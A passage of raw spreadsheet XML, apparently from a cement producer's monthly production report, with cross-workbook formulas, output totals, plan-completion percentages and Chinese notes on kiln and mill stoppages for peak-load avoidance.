    </row>
    <row r="52" ht="15.75" customHeight="1" spans="1:26">
      <c r="A52" s="191"/>
      <c r="B52" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C52" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D52" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E52" s="194">
        <v>175000</v>
      </c>
      <c r="F52" s="194">
        <f>'[13]2'!$D$19</f>
        <v>105046.44300005</v>
      </c>
      <c r="G52" s="225">
        <f>'[13]2'!$E$19</f>
        <v>2e-11</v>
      </c>
      <c r="H52" s="194">
        <f>G52+'1'!H52</f>
        <v>4e-11</v>
      </c>
      <c r="I52" s="194">
        <f>H52+yc!I52</f>
        <v>1383567.25</v>
      </c>
      <c r="J52" s="194">
        <f>'[13]2'!$I$19</f>
        <v>3521.253</v>
      </c>
      <c r="K52" s="194">
        <f>J52+'1'!K52</f>
        <v>8406.471</v>
      </c>
      <c r="L52" s="194">
        <f>K52+yc!L52</f>
        <v>1290100.671</v>
      </c>
      <c r="M52" s="194">
        <f>'[13]2'!$L$19</f>
        <v>96639.9720000502</v>
      </c>
      <c r="N52" s="207">
        <f>(M52+M53)/(65000+80000)*100</f>
        <v>66.6482565517588</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'[13]2'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G53" s="225">
        <f>'[13]2'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H53" s="194">
        <f>G53+'1'!H53</f>
        <v>0</v>
      </c>
      <c r="I53" s="194">
        <f>H53+yc!I53</f>
        <v>0</v>
      </c>
      <c r="J53" s="194">
        <f>'[13]2'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K53" s="194">
        <f>J53+'1'!K53</f>
        <v>0</v>
      </c>
      <c r="L53" s="194">
        <f>K53+yc!L53</f>
        <v>0</v>
      </c>
      <c r="M53" s="194">
        <f>'[13]2'!$L$23</f>
        <v>0</v>
      </c>
      <c r="N53" s="212"/>
      <c r="O53" s="200"/>
      <c r="P53" s="223" t="s">
        <v>262</v>
      </c>
      <c r="Q53" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R53" s="245"/>
      <c r="S53" s="237">
        <f>'[14]2'!$M$21+'[14]2'!$M$22+'[14]2'!$M$35</f>
        <v>1648.947</v>
      </c>
      <c r="T53" s="237">
        <f>'[14]2'!$N$21+'[14]2'!$N$22+'[14]2'!$N$35</f>
        <v>44.49</v>
      </c>
      <c r="U53" s="234">
        <f>T53+'1'!U53</f>
        <v>87.83</v>
      </c>
      <c r="V53" s="234">
        <f>U53+yc!V53</f>
        <v>38422.257</v>
      </c>
      <c r="W53" s="237">
        <f>'[14]2'!$Q$21+'[14]2'!$Q$22+'[14]2'!$Q$35</f>
        <v>63</v>
      </c>
      <c r="X53" s="234">
        <f>W53+'1'!X53</f>
        <v>132</v>
      </c>
      <c r="Y53" s="235">
        <f>X53+yc!Y53</f>
        <v>39623</v>
      </c>
      <c r="Z53" s="237">
        <f>'[14]2'!$T$21+'[14]2'!$T$22+'[14]2'!$T$35</f>
        <v>1604.777</v>
      </c>
    </row>
    <row r="54" ht="15.75" customHeight="1" spans="1:26">
      <c r="A54" s="191"/>
      <c r="B54" s="193"/>
      <c r="C54" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D54" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E54" s="194"/>
      <c r="F54" s="194"/>
      <c r="G54" s="225">
        <f>'[13]2'!$E$23</f>
        <v>0</v>
      </c>
      <c r="H54" s="194">
        <f>G54+'1'!H54</f>
        <v>0</v>
      </c>
      <c r="I54" s="194">
        <f>H54+yc!I54</f>
        <v>0</v>
      </c>
      <c r="J54" s="194">
        <f>'[13]2'!$I$47</f>
        <v>0</v>
      </c>
      <c r="K54" s="194">
        <f>J54+'1'!K54</f>
        <v>1107.886</v>
      </c>
      <c r="L54" s="194">
        <f>K54+yc!L54</f>
        <v>212549.736</v>
      </c>
      <c r="M54" s="194">
        <f>'[13]2'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N54" s="195"/>
      <c r="O54" s="200"/>
      <c r="P54" s="246" t="s">
        <v>263</v>
      </c>
      <c r="Q54" s="242" t="s">
        <v>279</v>
      </c>
      <c r="R54" s="247">
        <f>'[15]2'!$C$43</f>
        <v>0</v>
      </c>
      <c r="S54" s="247">
        <f>'[15]2'!$D$43</f>
        <v>467.66</v>
      </c>
      <c r="T54" s="247">
        <f>'[15]2'!$E$43</f>
        <v>0</v>
      </c>
      <c r="U54" s="234">
        <f>T54+'1'!U54</f>
        <v>0</v>
      </c>
      <c r="V54" s="248">
        <f>U54+yc!V54</f>
        <v>0</v>
      </c>
      <c r="W54" s="249">
        <f>'[15]2'!$H$43</f>
        <v>0</v>
      </c>
      <c r="X54" s="234">
        <f>W54+'1'!X54</f>
        <v>0</v>
      </c>
      <c r="Y54" s="250">
        <f>X54+yc!Y54</f>
        <v>0</v>
      </c>
      <c r="Z54" s="247">
        <f>'[15]2'!$K$43</f>
        <v>467.66</v>
      </c>
    </row>
    <row r="55" ht="15.75" customHeight="1" spans="1:26">
      <c r="A55" s="191"/>
      <c r="B55" s="193"/>
      <c r="C55" s="193"/>
      <c r="D55" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E55" s="194"/>
      <c r="F55" s="194"/>
      <c r="G55" s="225">
        <f>'[13]2'!$E$63</f>
        <v>0</v>
      </c>
      <c r="H55" s="194">
        <f>G55+'1'!H55</f>
        <v>0</v>
      </c>
      <c r="I55" s="194">
        <f>H55+yc!I55</f>
        <v>0</v>
      </c>
      <c r="J55" s="225">
        <f>'[13]2'!$I$63</f>
        <v>0</v>
      </c>
      <c r="K55" s="194">
        <f>J55+'1'!K55</f>
        <v>0</v>
      </c>
      <c r="L55" s="194">
        <f>K55+yc!L55</f>
        <v>35435.65</v>
      </c>
      <c r="M55" s="194"/>
      <c r="N55" s="195"/>
      <c r="O55" s="200"/>
      <c r="P55" s="251" t="s">
        <v>310</v>
      </c>
      <c r="Q55" s="252" t="s">
        <v>279</v>
      </c>
      <c r="R55" s="253">
        <f>'[16]2'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S55" s="253">
        <f>'[16]2'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T55" s="253">
        <f>'[16]2'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U55" s="254">
        <f>'[16]2'!$S$7</f>
        <v>0</v>
      </c>
      <c r="V55" s="255">
        <f>'[16]2'!$T$7</f>
        <v>0</v>
      </c>
      <c r="W55" s="256">
        <f>'[16]2'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X55" s="254">
        <f>'[16]2'!$W$7</f>
        <v>0</v>
      </c>
      <c r="Y55" s="257">
        <f>'[16]2'!$X$7</f>
        <v>0</v>
      </c>
      <c r="Z55" s="253">
        <f>'[16]2'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="56" ht="15.75" customHeight="1" spans="1:26">
      <c r="A56" s="191"/>
      <c r="B56" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C56" s="193"/>
      <c r="D56" s="193"/>
      <c r="E56" s="194"/>
      <c r="F56" s="194"/>
      <c r="G56" s="194"/>
      <c r="H56" s="194">
        <f>G56+'1'!H56</f>
        <v>0</v>
      </c>
      <c r="I56" s="194">
        <f>H56+yc!I56</f>
        <v>0</v>
      </c>
      <c r="J56" s="194">
        <f>J57+J60</f>
        <v>0</v>
      </c>
      <c r="K56" s="194">
        <f>J56+'1'!K56</f>
        <v>0</v>
      </c>
      <c r="L56" s="194">
        <f>K56+yc!L56</f>
        <v>0</v>
      </c>
      <c r="M56" s="194"/>
      <c r="N56" s="195"/>
      <c r="O56" s="258" t="s">
        <v>282</v>
      </c>
      <c r="P56" s="259" t="s">
        <v>229</v>
      </c>
      <c r="Q56" s="260" t="str">
        <f>'[8]2'!$Q$62</f>
        <v>1#窑:正常。2#窑:续停。水泥磨:1#磨：10:00-24:00避峰停机；2#磨：10:00-22:30避峰停机；3#磨：10:00-22:10避峰停机；4#磨：大修续停。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G57+'1'!H57</f>
        <v>0</v>
      </c>
      <c r="I57" s="194">
        <f>H57+yc!I57</f>
        <v>0</v>
      </c>
      <c r="J57" s="194">
        <f>SUM(J58:J59)</f>
        <v>0</v>
      </c>
      <c r="K57" s="194">
        <f>J57+'1'!K57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G58+'1'!H58</f>
        <v>0</v>
      </c>
      <c r="I58" s="194">
        <f>H58+yc!I58</f>
        <v>0</v>
      </c>
      <c r="J58" s="194"/>
      <c r="K58" s="194">
        <f>J58+'1'!K58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G59+'1'!H59</f>
        <v>0</v>
      </c>
      <c r="I59" s="194">
        <f>H59+yc!I59</f>
        <v>0</v>
      </c>
      <c r="J59" s="194"/>
      <c r="K59" s="194">
        <f>J59+'1'!K59</f>
        <v>0</v>
      </c>
      <c r="L59" s="194">
        <f>K59+yc!L59</f>
        <v>0</v>
      </c>
      <c r="M59" s="194"/>
      <c r="N59" s="195"/>
      <c r="O59" s="263"/>
      <c r="P59" s="264" t="s">
        <v>237</v>
      </c>
      <c r="Q59" s="271" t="str">
        <f>'[8]2'!$Q$65</f>
        <v>窑:续停。A组磨：8:00-24:00避峰停机。D1#磨：8:45-24:00避峰停机，D2#磨：8:45-24:00避峰停机。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G60+'1'!H60</f>
        <v>0</v>
      </c>
      <c r="I60" s="194">
        <f>H60+yc!I60</f>
        <v>0</v>
      </c>
      <c r="J60" s="194"/>
      <c r="K60" s="194">
        <f>J60+'1'!K60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'[14]2'!$D$6</f>
        <v>37769.1699999999</v>
      </c>
      <c r="G61" s="225">
        <f>'[14]2'!$E$6</f>
        <v>2463</v>
      </c>
      <c r="H61" s="194">
        <f>G61+'1'!H61</f>
        <v>5167</v>
      </c>
      <c r="I61" s="194">
        <f>H61+yc!I61</f>
        <v>1121040</v>
      </c>
      <c r="J61" s="194">
        <f>'[14]2'!$E$21</f>
        <v>3828.63</v>
      </c>
      <c r="K61" s="194">
        <f>J61+'1'!K61</f>
        <v>7071.46</v>
      </c>
      <c r="L61" s="194">
        <f>K61+yc!L61</f>
        <v>1108231.54</v>
      </c>
      <c r="M61" s="194">
        <f>'[14]2'!$H$6</f>
        <v>35864.7099999999</v>
      </c>
      <c r="N61" s="195">
        <f>M61/52000*100</f>
        <v>68.9705961538459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'[14]2'!$M$11+'[14]2'!$M$12+'[14]2'!$M$13+'[14]2'!$M$14+'[14]2'!$M$15+'[14]2'!$M$16+'[14]2'!$M$17+'[14]2'!$M$18</f>
        <v>18454.634</v>
      </c>
      <c r="G62" s="225">
        <f>'[14]2'!$N$11+'[14]2'!$N$12+'[14]2'!$N$13+'[14]2'!$N$14+'[14]2'!$N$15+'[14]2'!$N$16+'[14]2'!$N$17+'[14]2'!$N$18</f>
        <v>2278</v>
      </c>
      <c r="H62" s="194">
        <f>G62+'1'!H62</f>
        <v>2278</v>
      </c>
      <c r="I62" s="194">
        <f>H62+yc!I62</f>
        <v>838271.456</v>
      </c>
      <c r="J62" s="194">
        <f>'[14]2'!$Q$11+'[14]2'!$Q$12+'[14]2'!$Q$13+'[14]2'!$Q$14+'[14]2'!$Q$15+'[14]2'!$Q$16+'[14]2'!$Q$17+'[14]2'!$Q$18</f>
        <v>1911</v>
      </c>
      <c r="K62" s="194">
        <f>J62+'1'!K62</f>
        <v>3863</v>
      </c>
      <c r="L62" s="194">
        <f>K62+yc!L62</f>
        <v>838335.796</v>
      </c>
      <c r="M62" s="194">
        <f>'[14]2'!$T$11+'[14]2'!$T$12+'[14]2'!$T$13+'[14]2'!$T$14+'[14]2'!$T$15+'[14]2'!$T$16+'[14]2'!$T$17+'[14]2'!$T$18</f>
        <v>16869.634</v>
      </c>
      <c r="N62" s="207">
        <f>(M62+M63)/25000*100</f>
        <v>67.4785359999998</v>
      </c>
      <c r="O62" s="263"/>
      <c r="P62" s="274" t="s">
        <v>252</v>
      </c>
      <c r="Q62" s="271" t="str">
        <f>'[8]2'!$Q$71</f>
        <v>窑:续停。水泥磨:续停。</v>
      </c>
      <c r="R62" s="272"/>
      <c r="S62" s="272"/>
      <c r="T62" s="272"/>
      <c r="U62" s="272"/>
      <c r="V62" s="272"/>
      <c r="W62" s="272"/>
      <c r="X62" s="272"/>
      <c r="Y62" s="272"/>
      <c r="Z62" s="273"/>
    </row>
    <row r="63" ht="15.75" customHeight="1" spans="1:26">
      <c r="A63" s="191"/>
      <c r="B63" s="193"/>
      <c r="C63" s="193"/>
      <c r="D63" s="193" t="s">
        <v>284</v>
      </c>
      <c r="E63" s="194"/>
      <c r="F63" s="194">
        <f>'[14]2'!$M$19+'[14]2'!$M$20</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G63" s="225">
        <f>'[14]2'!$N$19+'[14]2'!$N$20</f>
        <v>0</v>
      </c>
      <c r="H63" s="194">
        <f>G63+'1'!H63</f>
        <v>0</v>
      </c>
      <c r="I63" s="194">
        <f>H63+yc!I63</f>
        <v>0</v>
      </c>
      <c r="J63" s="194">
        <f>'[14]2'!$Q$19+'[14]2'!$Q$20</f>
        <v>0</v>
      </c>
      <c r="K63" s="194">
        <f>J63+'1'!K63</f>
        <v>0</v>
      </c>
      <c r="L63" s="194">
        <f>K63+yc!L63</f>
        <v>0</v>
      </c>
      <c r="M63" s="194">
        <f>'[14]2'!$T$19+'[14]2'!$T$20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G64+'1'!H64</f>
        <v>0</v>
      </c>
      <c r="I64" s="194">
        <f>H64+yc!I64</f>
        <v>0</v>
      </c>
      <c r="J64" s="194">
        <f>J65</f>
        <v>0</v>
      </c>
      <c r="K64" s="194">
        <f>J64+'1'!K64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G65+'1'!H65</f>
        <v>0</v>
      </c>
      <c r="I65" s="194">
        <f>H65+yc!I65</f>
        <v>0</v>
      </c>
      <c r="J65" s="194">
        <f>SUM(J66:J67)</f>
        <v>0</v>
      </c>
      <c r="K65" s="194">
        <f>J65+'1'!K65</f>
        <v>0</v>
      </c>
      <c r="L65" s="194">
        <f>K65+yc!L65</f>
        <v>0</v>
      </c>
      <c r="M65" s="194"/>
      <c r="N65" s="195"/>
      <c r="O65" s="263"/>
      <c r="P65" s="264" t="s">
        <v>304</v>
      </c>
      <c r="Q65" s="271" t="str">
        <f>'[8]2'!$Q$74</f>
        <v>1#窑:续停；2#窑:续停；1#磨:8:00-18:30避峰停机。2#磨:8:00-24:00避峰停机。3#磨:8:00-22:30避峰停机。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G66+'1'!H66</f>
        <v>0</v>
      </c>
      <c r="I66" s="194">
        <f>H66+yc!I66</f>
        <v>0</v>
      </c>
      <c r="J66" s="194"/>
      <c r="K66" s="194">
        <f>J66+'1'!K66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G67+'1'!H67</f>
        <v>0</v>
      </c>
      <c r="I67" s="194">
        <f>H67+yc!I67</f>
        <v>0</v>
      </c>
      <c r="J67" s="194"/>
      <c r="K67" s="194">
        <f>J67+'1'!K67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'[15]2'!$D$6</f>
        <v>1502.56</v>
      </c>
      <c r="G68" s="194">
        <f>'[15]2'!$E$6</f>
        <v>0</v>
      </c>
      <c r="H68" s="194">
        <f>G68+'1'!H68</f>
        <v>0</v>
      </c>
      <c r="I68" s="194">
        <f>H68+yc!I68</f>
        <v>0</v>
      </c>
      <c r="J68" s="194">
        <f>'[15]2'!$H$6</f>
        <v>0</v>
      </c>
      <c r="K68" s="194">
        <f>J68+'1'!K68</f>
        <v>0</v>
      </c>
      <c r="L68" s="194">
        <f>K68+yc!L68</f>
        <v>0</v>
      </c>
      <c r="M68" s="194">
        <f>'[15]2'!$K$6</f>
        <v>1502.56</v>
      </c>
      <c r="N68" s="195">
        <f>M68/50000*100</f>
        <v>3.00512</v>
      </c>
      <c r="O68" s="263"/>
      <c r="P68" s="264" t="s">
        <v>262</v>
      </c>
      <c r="Q68" s="271" t="str">
        <f>'[8]2'!$Q$77</f>
        <v>1#磨8:00-22:15避峰停机:14.25小时(避峰)。2#磨8:00-24:00避峰停机:16小时(避峰)。</v>
      </c>
      <c r="R68" s="272"/>
      <c r="S68" s="272"/>
      <c r="T68" s="272"/>
      <c r="U68" s="272"/>
      <c r="V68" s="272"/>
      <c r="W68" s="272"/>
      <c r="X68" s="272"/>
      <c r="Y68" s="272"/>
      <c r="Z68" s="273"/>
    </row>
    <row r="69" ht="15.75" customHeight="1" spans="1:26">
      <c r="A69" s="191"/>
      <c r="B69" s="193" t="s">
        <v>283</v>
      </c>
      <c r="C69" s="193"/>
      <c r="D69" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E69" s="194"/>
      <c r="F69" s="194">
        <f>'[15]2'!$D$43+'[15]2'!$D$44</f>
        <v>467.66</v>
      </c>
      <c r="G69" s="194">
        <f>'[15]2'!$E$43+'[15]2'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H69" s="194">
        <f>G69+'1'!H69</f>
        <v>0</v>
      </c>
      <c r="I69" s="194">
        <f>H69+yc!I69</f>
        <v>0</v>
      </c>
      <c r="J69" s="194">
        <f>'[15]2'!$H$43+'[15]2'!$H$44</f>
        <v>0</v>
      </c>
      <c r="K69" s="194">
        <f>J69+'1'!K69</f>
        <v>0</v>
      </c>
      <c r="L69" s="194">
        <f>K69+yc!L69</f>
        <v>0</v>
      </c>
      <c r="M69" s="194">
        <f>'[15]2'!$K$43+'[15]2'!$K$44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'[15]2'!$D$45</f>
        <v>0</v>
      </c>
      <c r="G70" s="194">
        <f>'[15]2'!$E$45</f>
        <v>0</v>
      </c>
      <c r="H70" s="194">
        <f>G70+'1'!H70</f>
        <v>0</v>
      </c>
      <c r="I70" s="194">
        <f>H70+yc!I70</f>
        <v>0</v>
      </c>
      <c r="J70" s="194">
        <f>'[15]2'!$H$45</f>
        <v>0</v>
      </c>
      <c r="K70" s="194"/>
      <c r="L70" s="194">
        <f>K70+yc!L70</f>
        <v>0</v>
      </c>
      <c r="M70" s="194">
        <f>'[15]2'!$K$45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G71+'1'!H71</f>
        <v>0</v>
      </c>
      <c r="I71" s="194">
        <f>H71+yc!I71</f>
        <v>0</v>
      </c>
      <c r="J71" s="194">
        <f>J72</f>
        <v>0</v>
      </c>
      <c r="K71" s="194">
        <f>J71+'1'!K71</f>
        <v>0</v>
      </c>
      <c r="L71" s="194">
        <f>K71+yc!L71</f>
        <v>0</v>
      </c>
      <c r="M71" s="194"/>
      <c r="N71" s="195"/>
      <c r="O71" s="263"/>
      <c r="P71" s="264" t="s">
        <v>263</v>
      </c>
      <c r="Q71" s="271" t="str">
        <f>'[8]2'!$Q$80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G72+'1'!H72</f>
        <v>0</v>
      </c>
      <c r="I72" s="194">
        <f>H72+yc!I72</f>
        <v>0</v>
      </c>
      <c r="J72" s="194">
        <f>SUM(J73:J74)</f>
        <v>0</v>
      </c>
      <c r="K72" s="194">
        <f>J72+'1'!K72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G73+'1'!H73</f>
        <v>0</v>
      </c>
      <c r="I73" s="194">
        <f>H73+yc!I73</f>
        <v>0</v>
      </c>
      <c r="J73" s="194"/>
      <c r="K73" s="194">
        <f>J73+'1'!K73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G74+'1'!H74</f>
        <v>0</v>
      </c>
      <c r="I74" s="194">
        <f>H74+yc!I74</f>
        <v>0</v>
      </c>
      <c r="J74" s="194"/>
      <c r="K74" s="194">
        <f>J74+'1'!K74</f>
        <v>0</v>
      </c>
      <c r="L74" s="194">
        <f>K74+yc!L74</f>
        <v>0</v>
      </c>
      <c r="M74" s="194"/>
      <c r="N74" s="195"/>
      <c r="O74" s="263"/>
      <c r="P74" s="278" t="s">
        <v>311</v>
      </c>
      <c r="Q74" s="271" t="str">
        <f>'[8]2'!$Q$83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G75+'1'!H75</f>
        <v>0</v>
      </c>
      <c r="I75" s="194">
        <f>H75+yc!I75</f>
        <v>0</v>
      </c>
      <c r="J75" s="241">
        <f>J76</f>
        <v>0</v>
      </c>
      <c r="K75" s="194">
        <f>J75+'1'!K75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G76+'1'!H76</f>
        <v>0</v>
      </c>
      <c r="I76" s="194">
        <f>H76+yc!I76</f>
        <v>0</v>
      </c>
      <c r="J76" s="241">
        <f>SUM(J77:J78)</f>
        <v>0</v>
      </c>
      <c r="K76" s="194">
        <f>J76+'1'!K76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G77+'1'!H77</f>
        <v>0</v>
      </c>
      <c r="I77" s="194">
        <f>H77+yc!I77</f>
        <v>0</v>
      </c>
      <c r="J77" s="241"/>
      <c r="K77" s="194">
        <f>J77+'1'!K77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G78+'1'!H78</f>
        <v>0</v>
      </c>
      <c r="I78" s="194">
        <f>H78+yc!I78</f>
        <v>0</v>
      </c>
      <c r="J78" s="241"/>
      <c r="K78" s="194">
        <f>J78+'1'!K78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'[16]2'!$E$7</f>
        <v>427.7</v>
      </c>
      <c r="H79" s="194">
        <f>G79+'1'!H79</f>
        <v>1110.54</v>
      </c>
      <c r="I79" s="301">
        <f>H79+yc!I79</f>
        <v>148239.01</v>
      </c>
      <c r="J79" s="301">
        <f>'[16]2'!$I$7</f>
        <v>437.5</v>
      </c>
      <c r="K79" s="194">
        <f>J79+'1'!K79</f>
        <v>915.5</v>
      </c>
      <c r="L79" s="301">
        <f>K79+yc!L79</f>
        <v>142806.95</v>
      </c>
      <c r="M79" s="301">
        <f>'[16]2'!$L$7</f>
        <v>5079.82</v>
      </c>
      <c r="N79" s="302">
        <f>M79/50000*100</f>
        <v>10.15964</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'[16]2'!$R$15</f>
        <v>0</v>
      </c>
      <c r="H80" s="194">
        <f>G80+'1'!H80</f>
        <v>0</v>
      </c>
      <c r="I80" s="301">
        <f>H80+yc!I80</f>
        <v>0</v>
      </c>
      <c r="J80" s="301">
        <f>'[16]2'!$V$15</f>
        <v>0</v>
      </c>
      <c r="K80" s="194">
        <f>J80+'1'!K80</f>
        <v>0</v>
      </c>
      <c r="L80" s="301">
        <f>K80+yc!L80</f>
        <v>0</v>
      </c>
      <c r="M80" s="301">
        <f>'[16]2'!$Y$15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G81+'1'!H81</f>
        <v>0</v>
      </c>
      <c r="I81" s="301">
        <f>H81+yc!I81</f>
        <v>0</v>
      </c>
      <c r="J81" s="301"/>
      <c r="K81" s="194">
        <f>J81+'1'!K81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G82+'1'!H82</f>
        <v>0</v>
      </c>
      <c r="I82" s="301">
        <f>H82+yc!I82</f>
        <v>0</v>
      </c>
      <c r="J82" s="301"/>
      <c r="K82" s="194">
        <f>J82+'1'!K82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G83+'1'!H83</f>
        <v>0</v>
      </c>
      <c r="I83" s="301">
        <f>H83+yc!I83</f>
        <v>0</v>
      </c>
      <c r="J83" s="301"/>
      <c r="K83" s="194">
        <f>J83+'1'!K83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G84+'1'!H84</f>
        <v>0</v>
      </c>
      <c r="I84" s="301">
        <f>H84+yc!I84</f>
        <v>0</v>
      </c>
      <c r="J84" s="301"/>
      <c r="K84" s="194">
        <f>J84+'1'!K84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G85+'1'!H85</f>
        <v>0</v>
      </c>
      <c r="I85" s="301">
        <f>H85+yc!I85</f>
        <v>0</v>
      </c>
      <c r="J85" s="301"/>
      <c r="K85" s="194">
        <f>J85+'1'!K85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Z158"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="4" ySplit="4" topLeftCell="E5" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="I2" sqref="I2"/>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3/31</f>
        <v>0.0967741935483871</v>
      </c>
      <c r="J2" s="180"/>
      <c r="K2" s="181"/>
      <c r="L2" s="180"/>
      <c r="M2" s="180"/>
      <c r="N2" s="182">
        <v>45994</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18368.54</v>
      </c>
      <c r="H5" s="194">
        <f>G5+'2'!H5</f>
        <v>51549.08</v>
      </c>
      <c r="I5" s="194">
        <f>H5+yc!I5</f>
        <v>6206415.11</v>
      </c>
      <c r="J5" s="194">
        <f>J21+J31+J41+J51+J61+J68+J79</f>
        <v>21662.303</v>
      </c>
      <c r="K5" s="194">
        <f>J5+'2'!K5</f>
        <v>68546.723</v>
      </c>
      <c r="L5" s="194">
        <f>K5+yc!L5</f>
        <v>6218617.854</v>
      </c>
      <c r="M5" s="194">
        <f>M21+M31+M41+M51+M61+M68+M79</f>
        <v>250623.991</v>
      </c>
      <c r="N5" s="195">
        <f>M5/374000*100</f>
        <v>67.0117622994652</v>
      </c>
      <c r="O5" s="196" t="s">
        <v>228</v>
      </c>
      <c r="P5" s="197" t="s">
        <v>229</v>
      </c>
      <c r="Q5" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R5" s="198">
        <f>'[10]3'!$W$101</f>
        <v>272.458333333333</v>
      </c>
      <c r="S5" s="198">
        <f>'[10]3'!$X$101</f>
        <v>273.527777777778</v>
      </c>
      <c r="T5" s="198">
        <f>'[10]3'!$Y$101</f>
        <v>260.123124780817</v>
      </c>
      <c r="U5" s="198">
        <f>'[10]3'!$T$101</f>
        <v>100</v>
      </c>
      <c r="V5" s="198">
        <f>'[10]3'!$U$101</f>
        <v>100</v>
      </c>
      <c r="W5" s="198">
        <f>'[10]3'!$V$101</f>
        <v>64.9767433234421</v>
      </c>
      <c r="X5" s="198">
        <f>'[10]3'!$Q$101</f>
        <v>24</v>
      </c>
      <c r="Y5" s="198">
        <f>'[10]3'!$R$101</f>
        <v>72</v>
      </c>
      <c r="Z5" s="198">
        <f>'[10]3'!$S$101</f>
        <v>5255.319</v>
      </c>
    </row>
    <row r="6" ht="15.75" customHeight="1" spans="1:26">
      <c r="A6" s="191"/>
      <c r="B6" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C6" s="193" t="s">
        <v>232</v>
      </c>
      <c r="D6" s="193"/>
      <c r="E6" s="194"/>
      <c r="F6" s="194">
        <f>'[10]3'!$D$23+'[11]3'!$D$17+'[12]3'!$D$17+'[13]3'!$D$25+'[14]3'!$D$8+'[14]3'!$D$15+'[15]3'!$D$7</f>
        <v>32112.84</v>
      </c>
      <c r="G6" s="194">
        <f>'[10]3'!$E$23+'[11]3'!$E$17+'[12]3'!$E$17+'[13]3'!$E$25+'[14]3'!$E$8+'[14]3'!$E$15+'[15]3'!$E$7</f>
        <v>948</v>
      </c>
      <c r="H6" s="194">
        <f>G6+'2'!H6</f>
        <v>948</v>
      </c>
      <c r="I6" s="194">
        <f>H6+yc!I6</f>
        <v>277297.96</v>
      </c>
      <c r="J6" s="194">
        <f>'[10]3'!$I$23+'[11]3'!$I$17+'[12]3'!$I$17+'[13]3'!$I$25+'[14]3'!$E$23+'[14]3'!$E$30+'[15]3'!$H$7</f>
        <v>588.65</v>
      </c>
      <c r="K6" s="194">
        <f>J6+'2'!K6</f>
        <v>2366.01</v>
      </c>
      <c r="L6" s="194">
        <f>K6+yc!L6</f>
        <v>264563.71</v>
      </c>
      <c r="M6" s="194">
        <f>'[10]3'!$L$23+'[11]3'!$L$17+'[12]3'!$L$17+'[13]3'!$L$25+'[14]3'!$H$23+'[14]3'!$H$30+'[15]3'!$K$7</f>
        <v>30694.83</v>
      </c>
      <c r="N6" s="195"/>
      <c r="O6" s="199"/>
      <c r="P6" s="200"/>
      <c r="Q6" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R6" s="198">
        <f>'[10]3'!$W$102</f>
        <v>0</v>
      </c>
      <c r="S6" s="198">
        <f>'[10]3'!$X$102</f>
        <v>0</v>
      </c>
      <c r="T6" s="198">
        <f>'[10]3'!$Y$102</f>
        <v>240.280205356462</v>
      </c>
      <c r="U6" s="198">
        <f>'[10]3'!$T$102</f>
        <v>0</v>
      </c>
      <c r="V6" s="198">
        <f>'[10]3'!$U$102</f>
        <v>0</v>
      </c>
      <c r="W6" s="198">
        <f>'[10]3'!$V$102</f>
        <v>35.1780291790307</v>
      </c>
      <c r="X6" s="198">
        <f>'[10]3'!$Q$102</f>
        <v>0</v>
      </c>
      <c r="Y6" s="198">
        <f>'[10]3'!$R$102</f>
        <v>0</v>
      </c>
      <c r="Z6" s="198">
        <f>'[10]3'!$S$102</f>
        <v>2845.199</v>
      </c>
    </row>
    <row r="7" ht="15.75" customHeight="1" spans="1:26">
      <c r="A7" s="191"/>
      <c r="B7" s="191"/>
      <c r="C7" s="201" t="s">
        <v>331</v>
      </c>
      <c r="D7" s="201"/>
      <c r="E7" s="194"/>
      <c r="F7" s="194">
        <f>'[12]3'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G7" s="194">
        <f>'[12]3'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H7" s="194">
        <f>G7+'2'!H7</f>
        <v>0</v>
      </c>
      <c r="I7" s="194">
        <f>H7+yc!I7</f>
        <v>0</v>
      </c>
      <c r="J7" s="194">
        <f>'[12]3'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K7" s="194">
        <f>J7+'2'!K7</f>
        <v>0</v>
      </c>
      <c r="L7" s="194">
        <f>K7+yc!L7</f>
        <v>0</v>
      </c>
      <c r="M7" s="194">
        <f>'[12]3'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N7" s="195"/>
      <c r="O7" s="199"/>
      <c r="P7" s="200"/>
      <c r="Q7" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R7" s="202">
        <f>'[10]3'!$W$107</f>
        <v>124.09972299169</v>
      </c>
      <c r="S7" s="202">
        <f>'[10]3'!$X$107</f>
        <v>125.235160557898</v>
      </c>
      <c r="T7" s="198">
        <f>'[10]3'!$Y$107</f>
        <v>131.849252461987</v>
      </c>
      <c r="U7" s="198">
        <f>'[10]3'!$T$107</f>
        <v>45.125</v>
      </c>
      <c r="V7" s="198">
        <f>'[10]3'!$U$107</f>
        <v>42.8194444444444</v>
      </c>
      <c r="W7" s="198">
        <f>'[10]3'!$V$107</f>
        <v>31.1110286844708</v>
      </c>
      <c r="X7" s="198">
        <f>'[10]3'!$Q$107</f>
        <v>10.83</v>
      </c>
      <c r="Y7" s="198">
        <f>'[10]3'!$R$107</f>
        <v>30.83</v>
      </c>
      <c r="Z7" s="198">
        <f>'[10]3'!$S$107</f>
        <v>2516.26</v>
      </c>
    </row>
    <row r="8" ht="15.75" customHeight="1" spans="1:26">
